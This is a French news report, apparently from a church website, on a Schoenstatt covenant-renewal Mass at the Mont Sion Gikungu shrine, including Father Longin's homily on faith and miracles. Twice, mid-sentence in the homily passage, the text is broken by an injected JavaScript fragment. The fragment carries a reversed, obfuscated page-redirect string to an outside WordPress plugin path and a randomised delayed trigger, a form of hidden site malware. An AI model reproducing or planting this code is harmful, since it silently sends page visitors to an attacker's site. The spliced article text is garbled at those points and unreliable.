Au Sanctuaire Marial de Schoenstatt Mont Sion Gikungu, les Schoenstattiens et les autres fidèles ont célébré le 18ème jour du mois de  février 2019, le jour où ils renouvellent l’alliance d’amour qu’ils ont scellé avec la Mère Trois fois Admirable de Schoenstatt. Les cérémonies ont eu lieu dans une messe qui a débuté 17heures, présidée par le Père Longin NTIRANYIBAGIRA en concélébration avec le Père Léonce et le Père Jean Bernard, tous Pères de Schoenstatt.

 A l’intérieur, à l’extérieur dans la tente, et sur la pelouse de devant le Sanctuaire, les fidèles se sont déjà installés trente minutes avant que commence l’Eucharistie. La plus part sont dans des uniformes et foulards du Mouvement Schoenstatt. Ils sont calmes. Ils patientent pour le début de la célébration. Certains écrivent sur de petits papiers des petits texto qu’ils déposent dans le panier coutumier, comme leurs contributions au capital de grâces.

La cloche du Sanctuaire sonne. Tous les chrétiens se lèvent pour l’angélus. Après, la chorale Santa Maria entreprend le chant marquant le début de la messe.

« Nous sommes heureux de venir célébrer cette journée, remercier la Mère de Dieu, lui dire encore que nous l’aimons et s’engager de nouveau à lui manifester cette amour. » Tels ont été les propos du célébrant en guise d’introduction.

Homélie avec le Père Longin

« Le Sanctuaire est le symbole de Dieu parmi les siens » a-t-il dit. Selon lui, l’Evangile du jour est cohérent avec la célébration du renouvellement de l’alliance. Les pharisiens qui demandaient à Jésus un miracle venant du ciel, ne sont pas loin des fidèles qui cherchent des miracles qui s’opèrent au Sanctuaire. Il a d’ailleurs saisi l’occasion pour rappeler que le Sanctuaire Marial de Schoenstatt n’est pas le fruit de l’apparition, mais plutôt de la foi en la Providence Divine du Père Fondateur. « La foi toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit avoir la première place, et ceux qui cherchent des miracles se trompent » a-t-il signalé. Il a ajouté que par la foi, ils ont reçu un signe de l’amour de Dieu envers les siens, le Sanctuaire, qui va bientôt souffler ses 25 bougies.

D’après le Père Longin, le plus important n’est pas la demande des miracles parce que plusieurs grâces ont été reçues dans le Sanctuaire, et l’essentiel c’est contempler Jésus qui manifeste toujours sa gloire dans le Sanctuaire : « Etudions d’abord observer les signes de la Puissance divine parmi nous. Nous sommes appelés à mettre seulement notre confiance en Dieu. » « Jésus a-t-il poursuivi, a été fatigué par  ceux qui lui demandaient des miracles. Toi et moi, sommes-nous comme ces dernières qui voulaient avoir des miracles selon leur commande ? Je vous demande ce soir de ne pas tenter le Seigneur en lui demandant des prodiges.

Le célébrant a posé la question suivante : « Frère, ce jour extraordinaire, est-ce que tu désires des miracles ? As-tu déjà vu un signe de la Puissance de Dieu dans ta vie ? »  Après un moment de silence qui a suivi cette question, le célébrant a conclu son instruction en rappelant aux fidèles que la sainteté se manifeste par la confiance qu’ils toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doivent mettre en Dieu.

Les cérémonies du renouvellement de l’alliance

La contribution au capital de grâces consiste à montrer à la Vierge Marie les bonnes actions réalisées tout au long du mois écoulé, lui remercier, lui demander son intercession et aussi lui promettre de faire  quelque chose pour la gloire de son Fils Jésus.

Après l’homélie alors, le Prêtre a invité les fidèles à se rendre sur le lieu des cérémonies. Ils s’y sont rendus en chantant. Là, ils ont collecté tous les messages qui ont été écrits tout au long du mois, ils les ont mis à feu. Pendant que le feu consume, certains des fidèles ont  fait des Prières universelles, et après, tous les participants a prononcé quelques prières appropriées à la cérémonie, avant de regagner le Sanctuaire pour la continuation de la messe.

Le ciel était couvert de nuages mais il n’a pas plu. La messe a pris fin 19Heures moins quelques poussières de minutes dans un climat sain.

 

Brigitte IRAKOZE

Laisser un commentaire